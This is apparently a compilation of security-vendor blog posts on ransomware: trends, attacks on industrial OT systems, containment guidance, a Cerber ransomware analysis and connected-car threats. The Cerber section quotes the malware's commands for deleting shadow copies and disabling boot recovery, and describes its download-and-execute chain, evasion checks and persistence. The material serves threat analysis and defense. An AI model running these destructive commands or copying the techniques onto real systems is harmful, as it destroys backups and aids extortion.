              This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

              Immagine che contiene dispositivo

Descrizione generata automaticamente

              If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

              Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

              Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

              While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

              Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

              Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

              The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

              In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


              Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

              Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

              • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
              • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
              • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

              Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

              An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

              In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


              Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

              Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

              Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

              As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

              The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

              Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

              As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

              Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

              Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

              For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

              • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
              • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
              • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
              • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
              • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
              • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
              • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
              • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

              Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

              UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report:

              • Windows Firewall rule configurations to block specific binaries from establishing outbound connections from endpoints
              • Domain Controller isolation and recovery planning steps
              • Proactive GPO permissions review and monitoring guidance

              Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

              In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

              Ransomware is commonly deployed across an environment in two ways:

              1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
                • Manually run encryptors on targeted systems.
                • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
                • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
                • Deploy encryptors with existing software deployment tools utilized by the victim organization.
              2. Automated propagation:
                • Credential or Windows token extraction from disk or memory.
                • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
                • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

              The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

              • Endpoint segmentation
              • Hardening against common exploitation methods
              • Reducing the exposure of privileged and service accounts
              • Cleartext password protections

              If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

              Read the report today.

              *Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

              Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

              Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

              On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

              Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

              FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

              Attack Process

              The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

              1. Target receives and opens a Word document.
              2. Macro in document is invoked to run PowerShell in hidden mode.
              3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
              4. On successful connection, the ransomware is written to the disk of the victim.
              5. PowerShell executes the ransomware.
              6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
              7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
              8. Files are encrypted and messages are presented to the user requesting payment.

              Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

              The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

              PowerShell Abuse

              When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

              Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

              It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

              In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

              Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

              Cerber in Action

              Initial payload behavior

              Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

              If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

              Shadow deletion

              As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

              Vssadmin.exe "delete shadows /all /quiet"

              WMIC.exe "shadowcopy delete"

              Bcdedit.exe "/set {default} recoveryenabled no"

              Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

              Coercion

              People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

              Figure 2. A message to the victim after encryption

              The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

               

               

              Figure 3. Ransom offered to victim, which is discounted for five days

              Multilingual Support

              As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

              Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

              Encryption

              Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

              Selective Targeting

              Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

              The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

              Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

              Anti VM Checks

              The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

              Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

              Persistence

              Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

              • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
              • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
              • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
              • Common persistence methods such as run and runonce key are also used.
              A Solid Defense

              Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

              Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

              Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

              FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

              Conclusion

              Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

              Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

              HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

              Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

              Click here for more information about Exploit Guard technology.

              Connected Cars: The Open Road for Hackers

              As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

              Car Hacking?

              Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

              Ransomware

              The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make them attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

              For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

              Malicious C2 and Final Hop Points

              One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

              Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

              Understanding the Risk Landscape

              The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

              These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

              FireEye Capabilities

              FireEye combines our industry leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve their prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because threat attackers are consistently evolving.

              For more information, contact FireEye.

              FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.